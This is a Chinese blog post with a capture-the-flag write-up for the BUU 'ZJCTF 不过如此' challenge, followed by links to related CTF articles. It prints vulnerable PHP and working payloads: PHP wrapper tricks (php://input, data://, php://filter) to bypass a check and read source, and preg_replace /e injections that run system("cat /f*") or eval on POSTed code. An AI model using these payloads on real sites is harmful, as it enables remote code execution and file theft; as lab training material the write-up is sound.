BUU-ZJCTF-不过如此

最新推荐文章于 2023-03-29 17:23:46 发布
最新推荐文章于 2023-03-29 17:23:46 发布
阅读量195 收藏
点赞数
分类专栏: CTF训练日记 BUU 文章标签: php 正则表达式 perl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/120660449
版权

文章目录

wp

打开环境,还是代码

<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php    
}
else{
    highlight_file(__FILE__);
}
?>

绕过text和file简单,就是php伪协议

text=php://input,POST内容:I have a dream
或者:text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=
file=php://filter/read=convert.base64-encode/resource=next.php

得到next.php的源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
function getFlag(){
	@eval($_GET['cmd']);
}
?>

这儿就是一个preg_replace的/e模式与代码执行
preg_replace的简介

preg_replace的/e模式,可以让replacement(第二个参数)的内容来代码执行。

preg_replace的/e模式与代码执行
其中对正则反向引用的理解

反向引用就是正则匹配到后,匹配的内容确定,由\1来控制

下面是我的理解

题目的意思:先匹配到value的东西,然后,替换replacement的东西,/e模式下代码执行,相当于就
执行“\1组”里的代码。

所以payload

payload:?\S*=${getFlag()}&cmd=system("cat /f*");
or:?\S*=${eval($_POST[1])},POST内容:1=system("cat /f*");

这里正则不能用 .* 来匹配,因为.开头,会变成_
exp

import requests
for i in range(0,256):
     url="http://127.0.0.1/index.php?id=1&i"+chr(i)+"d1=1"
     r=requests.get(url)
     if '_' in r.content:
         print(str(i)+':'+chr(i))

其他知识点

php可变变量

https://www.php.net/manual/zh/language.variables.variable.php
<?php
$a='hello';
$$a='world',$$a变量就等于$hello
echo $a ${$a},使用{}是为了明确这个变量。
?>

正则表达式

\w 匹配字母或数字或下划线或汉字 等价于 '[^A-Za-z0-9_]'。
\s 匹配任意的空白符,\S是匹配除空白符的所有字符
\d 匹配数字
\b 匹配单词的开始或结束
^ 匹配字符串的开始
$ 匹配字符串的结束

匹配模式(preg_replace)
1/g 表示该表达式将用来在输入字符串中查找所有可能的匹配,返回的结果可以是多个。如果不加/g最多只会匹配一个
2/i 表示匹配的时候不区分大小写,这个跟其它语言的正则用法相同
3/m 表示多行匹配。什么是多行匹配呢?就是匹配换行符两端的潜在匹配。影响正则中的^$符号
4/s 与/m相对,单行模式匹配。
5/e 可执行模式,此为PHP专有参数,例如preg_replace函数。
6/x 忽略空白模式。
参考:
https://www.runoob.com/regexp/regexp-syntax.html
Z3eyOnd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【学习笔记 39】 buu [BJDCTF2020]ZJCTF不过如此
weixin_43553654的博客
08-01 327
0x00 知识点 文件包含伪协议 preg_replace()使用的/e模式可以存在远程执行代码 0x01 知识点详解 什么伪协议? 答:PHP伪协议事实上就是支持的协议与封装协议 一共有一下12种 a. file:// — 访问本地文件系统 b. http:// — 访问 HTTP(s) 网址 c. ftp:// — 访问 FTP(s) URLs d. php:// — 访问各个输入/输出流(I/O streams) e. zlib:// — 压缩流 f. data:// — 数据(RFC 23
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
[BJDCTF2020]ZJCTF不过如此
05-07 348
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_mat.
BUUCTF WEB ZJCTF,不过如此1
qq_41696858的博客
12-11 545
上来就给源码,很直接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; i
web buuctf [BJDCTF2020]ZJCTF不过如此
weixin_44214568的博客
03-23 1958
考点:正则匹配; 正则-反向引用; preg_replace /e模式漏洞 1. 一路做buuctf下来, web buuctf [ZJCTF 2019]NiZhuanSiWei1_半杯雨水敬过客的博客-CSDN博客 和这题的思路一样,不做赘述,主要是利用php伪协议 1.令text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=(I have a dream的base64加密) file=php://filter/read=convert..
BUUCTF [BJDCTF2020]ZJCTF不过如此
Chu_Jian_Xiong的博客
09-29 567
[BJDCTF2020]ZJCTF不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
BUUCTF- ZJCTF不过如此题目解析
2201_75327657的博客
03-29 212
发现有preg——replace说明有代码执行问题。源码中的\\1实际等于\1本身的\1有其他意思。打开查看源码查看有file说明是伪协议。preg——replace相关链接(得到base64编码解析出来为。那就利用filter查看。
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
Project-Decoder-Ring
03-27
项目解码器环 项目描述:解码器环 该应用程序具有3种不同的解码器。 1.凯撒密码是一种替换密码,其中明文中... 2.... 3.... “单位”可以是单个字母(最常见),成对的字母,字母的三元组,上述的混合形式,等等。... 屏幕截图:
CTF训练之路2--ctfshow内部赛
unexpectedthing的博客
11-07 6548
文章目录签到登录就有flag出题人不想跟你说话.jpg蓝廋一览无余签退 签到 一进去就是login界面,F12看到有个register.php,说明就是一个二次注入的sql注入题。 所谓二次注入,就是再register中构造sql语句,然后登录login来触发。 找到羽师傅的脚本 import requests import re url_register = "http://7b093e85-e6d5-4784-adab-49ba20992eda.challenge.ctf.show/register.
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 6285
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
phar反序列化+两道CTF例题
unexpectedthing的博客
02-14 6182
Phar反序列化 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。(漏洞利用点) 什么是phar文件 在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数,如(fopen(),copy(),file
SSRF--gopher协议打FastCGI
unexpectedthing的博客
11-30 5988
FastCGI 定义: 什么是CGI CGI全称"通用网关接口"(Common Gateway Interface),用于HTTP服务器与其它机器上的程序服务通信交流的一种工具,CGI程序须运行在网络服务器上。 传统CGI接口方式的主要缺点是性能较差,因为每次HTTP服务器遇到动态程序时都需要重启解析器来执行解析,然后结果被返回给HTTP服务器。这在处理高并发访问几乎是不可用的,因此就诞生了FastCGI。另外传统的CGI接口方式安全性也很差。 什么是FastCGI FastCGI是一个可伸缩地、高速地
php原生类的总结
unexpectedthing的博客
12-12 5319
文章目录前言利用Error/Exception 内置类进行 XSSError内置类Exception内置类[BJDCTF 2nd]xss之光使用 Error/Exception 内置类绕过哈希比较Error类Exception 类[2020 极客大挑战]GreatphpSoapClient类来进行SSRF 前言 之所以这个总结,极客大挑战的SoEzunser考到了php原生类来遍历目录 其实,在CTF题目中,可以利用php原生类来进行XSS,反序列化,SSRF,XXE和读文件的思路 通过遍历看一下php的内
SSRF---gopher和dict打redis
unexpectedthing的博客
12-01 4869
前言 之前关于SSRF打redis(redis的未授权漏洞)都没咋总结,现在总结一下。 redis简介 redis是一个key-value存储系统,是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询, bitmaps, hyperloglogs 和 地理空间(geospatial) 索引半径查询。
绕过disable_function总结
unexpectedthing的博客
03-27 4680
前言 有些时候,phpinfo()有disable_functions 蚁剑终端命令不起作用,就可能是df的问题 黑名单绕过 就是一些运维人员php命令执行的函数没禁用完 exec,passthru,shell_exec,eval,system,popen,proc_open(),pcntl_exec 前几种都比较简单 popen 打开进程文件指针 <?php $command=$_POST['cmd']; $handle = popen($command,"r"); while(!feof($
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值